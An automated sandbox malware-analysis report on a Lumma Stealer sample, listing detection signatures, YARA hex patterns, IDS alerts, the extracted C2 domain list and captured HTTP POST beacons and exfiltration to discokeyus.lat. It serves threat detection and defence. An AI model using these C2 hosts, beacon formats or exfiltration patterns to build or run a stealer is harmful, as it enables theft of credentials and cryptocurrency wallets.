
Windows Analysis Report
k6A01XaeEn.exe

Overview

General Information

Sample name: k6A01XaeEn.exe (renamed because original name is a hash value)
Original sample name: fd5fe344fef63284ed51951698535fca.exe
Analysis ID: 1577869
MD5: fd5fe344fef63284ed51951698535fca
SHA1: edd4a2cda68245606465c920ad824d8eed5d0c56
SHA256: 9465a7b43d43fbd350d67bb6d7720306525fc409d9189e7ac5a2ada996b08bf5
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • k6A01XaeEn.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\k6A01XaeEn.exe" MD5: FD5FE344FEF63284ED51951698535FCA)
    • WerFault.exe (PID: 7188 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 1672 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["grannyejh.lat", "crosshuaht.lat", "energyaffai.lat", "rapeflowwj.lat", "necklacebudi.lat", "sustainskelet.lat", "discokeyus.lat", "aspecteirs.lat"], "Build id": "4h5VfH--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.2340966551.0000000000A79000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1418:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.1940934471.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1940699958.0000000000B48000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2340676868.00000000009E0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: k6A01XaeEn.exe PID: 7736 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T20:54:16.261976+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:18.239271+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:20.632864+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:24.060830+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:27.078444+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:32.981624+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:39.281396+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:46.297827+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:16.970035+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:19.027809+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:16.970035+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:19.027809+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:16.261976+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:18.239271+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:20.632864+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49732 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:24.060830+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49733 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:27.078444+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49734 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:32.981624+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49737 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:39.281396+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49742 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:46.297827+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49743 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:14.474132+0100 | 2058360 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 64461 | 1.1.1.1 | 53 | UDP
2024-12-18T20:54:22.529357+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.21.21.99 | 443 | TCP


            AV Detection

Source: https://discokeyus.lat/xl | Avira URL Cloud: Label: malware
Source: https://discokeyus.lat/apiH | Avira URL Cloud: Label: malware
Source: https://discokeyus.lat/api06&cwn | Avira URL Cloud: Label: malware
Source: https://discokeyus.lat/dl | Avira URL Cloud: Label: malware
Source: https://discokeyus.lat/api | Avira URL Cloud: Label: malware
Source: https://discokeyus.lat/3 | Avira URL Cloud: Label: malware
Source: https://discokeyus.lat/apiji | Avira URL Cloud: Label: malware
Source: https://discokeyus.lat/apiMcubs | Avira URL Cloud: Label: malware
Source: https://discokeyus.lat/ | Avira URL Cloud: Label: malware
Source: https://discokeyus.lat/;o | Avira URL Cloud: Label: malware
Source: https://discokeyus.lat:443/api | Avira URL Cloud: Label: malware
Source: https://discokeyus.lat/apiU | Avira URL Cloud: Label: malware
Source: 0.3.k6A01XaeEn.exe.2500000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["grannyejh.lat", "crosshuaht.lat", "energyaffai.lat", "rapeflowwj.lat", "necklacebudi.lat", "sustainskelet.lat", "discokeyus.lat", "aspecteirs.lat"], "Build id": "4h5VfH--"}
Source: k6A01XaeEn.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: k6A01XaeEn.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: rapeflowwj.lat
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: crosshuaht.lat
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sustainskelet.lat
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: aspecteirs.lat
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: energyaffai.lat
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: necklacebudi.lat
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: discokeyus.lat
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: grannyejh.lat
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: discokeyus.lat
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String decryptor: 4h5VfH--

            Compliance

Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Unpacked PE file: 0.2.k6A01XaeEn.exe.400000.0.unpack
Source: k6A01XaeEn.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\k6A01XaeEn.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Directory queried: number of queries: 1001

            Networking

Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49733 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.4:64461 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49730 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49737 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49734 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49743 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49731 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49732 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49742 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.21.99:443
Source: Malware configuration extractor | URLs: grannyejh.lat
Source: Malware configuration extractor | URLs: crosshuaht.lat
Source: Malware configuration extractor | URLs: energyaffai.lat
Source: Malware configuration extractor | URLs: rapeflowwj.lat
Source: Malware configuration extractor | URLs: necklacebudi.lat
Source: Malware configuration extractor | URLs: sustainskelet.lat
Source: Malware configuration extractor | URLs: discokeyus.lat
Source: Malware configuration extractor | URLs: aspecteirs.lat
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.21.99:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: discokeyus.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 42; Host: discokeyus.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=6ZHM4NAAMLP; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 18116; Host: discokeyus.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=V0EFVHPNCHU9SB; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8755; Host: discokeyus.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=LQV78KY8PLN9TNUXAWQ; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 20438; Host: discokeyus.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=5FSAVCL8ZA8U7M6; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 1231; Host: discokeyus.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=2HG77GWVKDAUVJU866; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 568750; Host: discokeyus.lat
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: discokeyus.lat
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: discokeyus.lat
Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: k6A01XaeEn.exe, 00000000.00000003.2018293078.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2088649223.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2088366995.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.6.dr | String found in binary or memory: http://upx.sf.net
Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: k6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: k6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: k6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: k6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: k6A01XaeEn.exe, 00000000.00000002.2341497324.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/
Source: k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/3
Source: k6A01XaeEn.exe, 00000000.00000002.2341497324.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/;o
Source: k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1850513457.000000000321F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/api
Source: k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/api06&cwn
Source: k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apiH
Source: k6A01XaeEn.exe, 00000000.00000003.1850513457.000000000321F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apiMcubs
Source: k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apiU
Source: k6A01XaeEn.exe, 00000000.00000003.1850513457.000000000321F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apiji
Source: k6A01XaeEn.exe, 00000000.00000002.2341497324.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/dl
Source: k6A01XaeEn.exe, 00000000.00000003.2018238766.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2005608699.0000000000B52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/xl
Source: k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003233000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936118211.0000000003233000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1940512058.0000000003233000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2018318661.0000000003245000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/api
Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: k6A01XaeEn.exe, 00000000.00000003.1818839790.0000000003270000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.microsof
Source: k6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: k6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: k6A01XaeEn.exe, 00000000.00000003.1818932883.0000000003269000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818839790.0000000003270000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1850465870.0000000003269000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
